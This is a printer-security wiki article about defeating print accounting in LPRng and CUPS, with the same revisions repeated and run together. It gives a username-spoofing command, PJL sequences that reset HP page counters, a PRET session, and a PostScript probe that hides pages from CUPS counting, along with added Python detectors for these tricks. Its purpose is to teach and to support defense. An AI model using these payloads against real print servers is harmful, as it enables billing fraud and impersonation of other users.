'''How to test for this attack?''' If your system is already configured to use the print server to be tested, you can verify proper authentication by trying to print with a custom username like this:

<syntaxhighlight lang=sh>
lp -U nobody test.ps
</syntaxhighlight>

'''Who can perform this attack?''' Anyone who can access the print server (as said, if the printer can be accessed directly you have already lost anyway).

== Page counter manipulation ==

=== Hardware page counters ===

For correct accounting, the number of printed pages must be determined by the printing system, which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode.
This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and the ''HP LaserJet 4250N'' can be manipulated within a print job. At the end of the document to be printed, and separated by the [[UEL]], the counter simply has to be reset to its original value (for example, <code>2342</code>):

<pre>
\x1b%-12345X@PJL JOB
This page was printed for free
\x1b%-12345X@PJL EOJ
\x1b%-12345X@PJL JOB
@PJL SET SERVICEMODE=HPBOISEID
@PJL SET PAGES=2342
\x1b%-12345X@PJL EOJ
</pre>

Depending on the logic of the accounting software, an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices; however, this method is not suited if a specific value is desired. Lowering the page counter can also be used to sell a printer above its price, as the counter is comparable to the odometer when buying a second-hand car. It is, however, worth emphasizing that resetting the page counter is not necessarily done for malicious purposes: it is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to counter such unethical practices it is absolutely legitimate to reset the page counter.

'''How to test for this attack?''' On older HP LaserJets the ''pagecounter'' command of [[PRET]] can be used to easily set hardware page counters:

<pre>
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> pagecounter 10
Old pagecounter: 53214
New pagecounter: 10
</pre>

'''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].
=== Software page counters ===

CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists – which will return ''false'' when interpreted in CUPS/Ghostscript – before actually printing the document, as shown below.

<syntaxhighlight lang=postscript>
currentsystemparams (PageCount) known {
  % [...] code which is only executed on a printer device [...]
} if
</syntaxhighlight>

This way, the accounting software used by CUPS renders a different document than the printer. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS passes the code through a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter.

'''How to test for this attack?''' Wrap an arbitrary multi-page PostScript document in the code above and print it. Then go to <code>http://printserver:631/jobs?which_jobs=all</code> and check CUPS's page count for this print job. Note that you have to establish a raw queue, that is, a queue where the filtering system is not involved and the print job goes directly to the printer. For CUPS, this is done by setting the content type to <code>application/vnd.cups-raw</code>. If your system is already configured to use the print server to be tested, simply use <code>lp -o raw test.ps</code>.

'''Who can perform this attack?''' Anyone who can forward jobs to the (CUPS-based) print server. However, it deserves to be mentioned that only a local attacker has an actual benefit from free hard copies.

<!-- % number of copies vs. density
% http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532
% http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups
% http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works
% http://www.cups.org/doc/accounting.html
% http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html
% http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html
% http://lists.pykota.com/pipermail/pykota/2006-October/004177.html
-->
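Both counter manipulations described in this section (resetting the hardware counter with PJL <code>SET PAGES</code> inside a job, and PostScript that renders differently under CUPS/Ghostscript than on the printer) leave traces a print server can look for. The following Python script is an added example, not code from this page, LPRng, CUPS or PRET. It assumes the server can see each job as raw bytes and can read the hardware counter before and after a job (for example with <code>@PJL INFO PAGECOUNT</code>, as LPRng does); cross-checking that hardware delta against the software page count is my suggestion, not a feature of either system. The sample job is constructed from the sequences shown on this page.

```python
"""Inspect a raw print job and cross-check page-counter readings.

Added example for this wiki page; not code from the page, LPRng, CUPS or PRET.
Two checks a print server can run before forwarding a job or when closing the
accounting record:
  * inspect_job(): split the job on the UEL and report PJL commands that write
    the hardware page counter (SET SERVICEMODE / SET PAGES, as on the page) and
    PostScript that probes the interpreter (currentsystemparams / PageCount),
    which is how a job shows the accounting renderer a different document.
  * check_counter_delta(): compare the hardware counter read before and after
    the job (LPRng style) with the software page count (CUPS style); either
    manipulation makes the two disagree. Cross-checking both counters is a
    suggestion of this example, not a feature of either system.
The sample job bytes are constructed from the sequences shown on the page.
"""
import re

UEL = b"\x1b%-12345X"  # Universal Exit Language, separates PJL/PDL sections

# PJL variables a user job has no business writing (taken from the page).
PJL_COUNTER_WRITE = re.compile(rb"@PJL\s+SET\s+(SERVICEMODE|PAGES)\s*=\s*(\S+)", re.I)
# PostScript constructs used to tell a real printer from Ghostscript.
PS_PROBE = re.compile(rb"currentsystemparams|\(PageCount\)\s*known")

# Constructed sample: a PostScript body that only draws on a real printer,
# followed by a PJL section that resets the hardware counter.
SAMPLE_JOB = (
    UEL + b"@PJL JOB\r\n"
    b"%!PS-Adobe-3.0\r\n"
    b"currentsystemparams (PageCount) known { 72 72 moveto (free) show showpage } if\r\n"
    + UEL + b"@PJL EOJ\r\n"
    + UEL + b"@PJL JOB\r\n@PJL SET SERVICEMODE=HPBOISEID\r\n@PJL SET PAGES=2342\r\n"
    + UEL + b"@PJL EOJ\r\n"
)


def split_on_uel(job):
    """Return the non-empty sections between UEL markers, in order."""
    return [s for s in job.split(UEL) if s.strip()]


def inspect_job(job):
    """Return (kind, section_index, detail, value) tuples, one per finding."""
    findings = []
    for idx, section in enumerate(split_on_uel(job)):
        for m in PJL_COUNTER_WRITE.finditer(section):
            findings.append(("pjl-counter-write", idx,
                             m.group(1).decode().upper(), m.group(2).decode()))
        for m in PS_PROBE.finditer(section):
            findings.append(("ps-environment-probe", idx, m.group(0).decode(), ""))
    return findings


def check_counter_delta(before, after, software_pages):
    """Reconcile the hardware counter delta with the software page count.

    before/after: hardware counter readings taken around one job;
    software_pages: pages counted by the PDL-parsing accountant.
    Returns (ok, reason)."""
    if before < 0 or after < 0:
        return False, "negative counter reading"
    if after < before:
        return False, f"hardware counter went backwards ({before} -> {after})"
    delta = after - before
    if delta != software_pages:
        return False, f"hardware delta {delta} != software count {software_pages}"
    return True, "counters agree"


if __name__ == "__main__":
    for kind, idx, detail, value in inspect_job(SAMPLE_JOB):
        print(f"section {idx}: {kind} {detail} {value}".rstrip())
    # Counter reset inside the job: the hardware counter shows no change
    # although a page was printed and the software counter billed one.
    print(check_counter_delta(2342, 2342, 1))
```

Findings from <code>inspect_job</code> are review candidates rather than proof: vendor drivers emit their own <code>@PJL SET</code> commands and legitimate PostScript does query <code>currentsystemparams</code>, so the value of the scan lies in whitelisting what your drivers actually send. The counter reconciliation is the more robust of the two because it does not depend on recognising a particular trick, but it is only meaningful when every job reaches the printer through the server; a job that goes to port 9100 or USB directly is never seen by either check, which is why the page insists on restricting direct printer access first.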
'''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. 
The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. '''How to test for this attack?''' If your system is already configured to use the print server to be tested, you can verify proper authentication trying to print with a custom username like this: lp -U nobody test.ps '''Who can perform this attack?''' Anyone who can access the print server (as said, if the printer can be accessed directly you have already lost anyway). == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode. This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and the ''HP LaserJet 4250N'' can be manipulated within a print job. 
At the end of the document to be printed and separated by the [[UEL]], the counter simply has to be reset to its original value (for example, <code>2342</code>): \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. '''How to test for this attack?''' On older HP laserjets the ''pagecounter'' command of [[PRET]] can be used to easily set hardware pagecounters: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> pagecounter 10 Old pagecounter: 53214 New pagecounter: 10 '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Software page counters === CUPS uses software page counters which have been implemented for all major page description languages. 
For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists – which will return ''false'' when interpreted in CUPS/Ghostscript – before actually printing the document as shown below. <syntaxhighlight lang=postscript> currentsystemparams (PageCount) known { <@\textit{[...] code which is only executed on a printer device [...]}@> } if </syntaxhighlight> This way, the accounting software used by CUPS renders a different document than the printer. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter. '''How to test for this attack?''' Wrap an arbitrary multi-page PostScript document in the code above and print. Then go to <code>http://printserver:631/jobs?which_jobs=all</code> and check CUPS's page counter for this print job. Note that have to establish a raw raw queue. This is, a queue where the filtering system is not involved and the print job goes directly to a printer. For CUPS, this is done done by setting the content type to <code>application/vnd.cups-raw</code>. If your system is already configured to use the print server to be tested, simply use: <code>lp -o raw test.ps</code>. '''Who can perform this attack?''' Anyone who forward jobs to the (CUPS based) print server. However it deserves to be mentioned that only a local attacker has an actual benefit of free hard copies. <!-- % number of copies vs. 
density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html --> ---- a65bc6ffe4ceb7b73710bdf36938552977e70bbe 123 122 2017-01-14T19:54:38Z Admin 1 /* Software page counters */ wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. == Introduction to print job accounting == There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. 
The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. 
Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. '''How to test for this attack?''' If your system is already configured to use the print server to be tested, you can verify proper authentication trying to print with a custom username like this: lp -U nobody test.ps '''Who can perform this attack?''' Any anyone who can access the print server (as said, if the printer can be accessed directly you have already lost anyway). == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode. 
This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and the ''HP LaserJet 4250N'' can be manipulated within a print job. At the end of the document to be printed and separated by the [[UEL]], the counter simply has to be reset to its original value (for example, <code>2342</code>): \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. '''How to test for this attack?''' On older HP laserjets the ''pagecounter'' command of [[PRET]] can be used to easily set hardware pagecounters: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> pagecounter 10 Old pagecounter: 53214 New pagecounter: 10 '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. 
=== Software page counters === CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists – which will return ''false'' when interpreted in CUPS/Ghostscript – before actually printing the document as shown below. <syntaxhighlight lang=postscript> currentsystemparams (PageCount) known { <@\textit{[...] code which is only executed on a printer device [...]}@> } if </syntaxhighlight> This way, the accounting software used by CUPS renders a different document than the printer. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter. '''How to test for this attack?''' Wrap an arbitrary multi-page PostScript document in the code above and print. Then go to <code>http://printserver:631/jobs?which_jobs=all</code> and check CUPS's page counter for this print job. Note that have to establish a raw raw queue. This is, a queue where the filtering system is not involved and the print job goes directly to a printer. For CUPS, this is done done by setting the content type to <code>application/vnd.cups-raw</code>. If your system is already configured to use the print server to be tested, simply use: <code>lp -o raw test.ps</code>. '''Who can perform this attack?''' Any anyone who forward jobs to the (CUPS based) print server. However it deserves to be mentioned that only a local attacker has an actual benefit of free hard copies. <!-- % number of copies vs. 
density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html --> ---- 7bf564b8fec12bf1eec2135c1ad5252ef0c29a46 122 121 2017-01-14T19:54:11Z Admin 1 /* Software page counters */ wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. == Introduction to print job accounting == There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. 
The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. 
Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. '''How to test for this attack?''' If your system is already configured to use the print server to be tested, you can verify proper authentication trying to print with a custom username like this: lp -U nobody test.ps '''Who can perform this attack?''' Any anyone who can access the print server (as said, if the printer can be accessed directly you have already lost anyway). == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode. 
This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and the ''HP LaserJet 4250N'' can be manipulated within a print job. At the end of the document to be printed and separated by the [[UEL]], the counter simply has to be reset to its original value (for example, <code>2342</code>): \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. '''How to test for this attack?''' On older HP laserjets the ''pagecounter'' command of [[PRET]] can be used to easily set hardware pagecounters: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> pagecounter 10 Old pagecounter: 53214 New pagecounter: 10 '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. 
=== Software page counters ===

CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists – which will return ''false'' when interpreted in CUPS/Ghostscript – before actually printing the document as shown below.

<syntaxhighlight lang=postscript>
currentsystemparams (PageCount) known {
  % [...] code which is only executed on a printer device [...]
} if
</syntaxhighlight>

This way, the accounting software used by CUPS renders a different document than the printer. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter.

'''How to test for this attack?''' Wrap an arbitrary multi-page PostScript document in the code above and print it. Then go to <code>http://printserver:631/jobs?which_jobs=all</code> and check CUPS's page counter for this print job. Note that you have to set up a raw queue, that is, a queue where the filtering system is not involved and the print job goes directly to the printer. For CUPS, this is done by setting the content type to <code>application/vnd.cups-raw</code>. If your system is already configured to use the print server to be tested, simply use: <code>lp -o raw test.ps</code>.

'''Who can perform this attack?''' Anyone who can forward jobs to the (CUPS based) print server. (However, it deserves to be mentioned that only a local attacker has an actual benefit from free hard copies.)

<!-- % number of copies vs.
density
% http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532
% http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups
% http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works
% http://www.cups.org/doc/accounting.html
% http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html
% http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html
% http://lists.pykota.com/pipermail/pykota/2006-October/004177.html
-->
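Added example for the software page counter trick described above (not code from this wiki, CUPS or Ghostscript): a lexical check that the operator of a raw queue can run on incoming PostScript to spot the <code>currentsystemparams (PageCount) known</code> probe and count the <code>showpage</code> operators hidden behind it, which is exactly the part a Ghostscript based counter never executes. It assumes the job is available as raw PostScript text and is a tokenizer rather than an interpreter, so loops inside the guarded block are not expanded; the sample jobs are constructed.

```python
"""Flag PostScript jobs that branch on the PageCount system parameter.

Added example for the software page counter section; not code from the
Hacking Printers wiki, CUPS or Ghostscript. Assumes raw PostScript text
(the raw queue scenario described above) and performs a lexical scan only.
"""
import re

# One regex for strings, comments, braces and bare tokens; strings are
# matched first so a '%' inside a string is not mistaken for a comment.
_TOKEN_RE = re.compile(r"\((?:[^()\\]|\\.)*\)|%[^\r\n]*|[{}]|[^\s{}()%]+")

# The three-token probe shown on this page.
PROBE = ("currentsystemparams", "(PageCount)", "known")


def tokenize(ps: str) -> list[str]:
    """Return PostScript tokens with comments dropped (strings kept whole)."""
    return [t for t in _TOKEN_RE.findall(ps) if not t.startswith("%")]


def find_pagecount_probes(tokens: list[str]) -> list[int]:
    """Token offsets at which the PageCount probe occurs."""
    return [i for i in range(len(tokens) - 2) if tuple(tokens[i:i + 3]) == PROBE]


def guarded_showpages(tokens: list[str]) -> int:
    """Count showpage operators inside the { ... } if block after each probe.

    A Ghostscript based software counter sees `known` return false and skips
    this block, while the printer executes it. Loops are not expanded, so the
    real number of hidden pages may be higher; any non-zero value is a signal.
    """
    hidden = 0
    for start in find_pagecount_probes(tokens):
        i = start + 3
        if i >= len(tokens) or tokens[i] != "{":
            continue  # probe without a procedure body: nothing to count
        depth = 0
        for tok in tokens[i:]:
            if tok == "{":
                depth += 1
            elif tok == "}":
                depth -= 1
                if depth == 0:
                    break
            elif tok == "showpage":
                hidden += 1
    return hidden


def accounting_mismatch(ps: str) -> dict:
    """Compare all showpage operators with those hidden from the counter."""
    tokens = tokenize(ps)
    hidden = guarded_showpages(tokens)
    return {
        "showpage_total": tokens.count("showpage"),
        "hidden_behind_probe": hidden,
        "suspicious": hidden > 0,
    }


# Constructed sample in the shape described on this page: one page that the
# software counter sees, followed by pages only a real printer executes.
SAMPLE_JOB = """%!PS-Adobe-3.0
/Helvetica findfont 24 scalefont setfont
72 700 moveto (Accounted page) show showpage
currentsystemparams (PageCount) known {
  % only executed on a printer device, invisible to the CUPS page counter
  72 700 moveto (Hidden page 1) show showpage
  72 700 moveto (Hidden page 2) show showpage
  72 700 moveto (Hidden page 3) show showpage
} if
"""

# Constructed benign single-page job.
BENIGN_JOB = """%!PS-Adobe-3.0
72 700 moveto (Hello) show showpage
"""

if __name__ == "__main__":
    print("sample:", accounting_mismatch(SAMPLE_JOB))
    print("benign:", accounting_mismatch(BENIGN_JOB))
```

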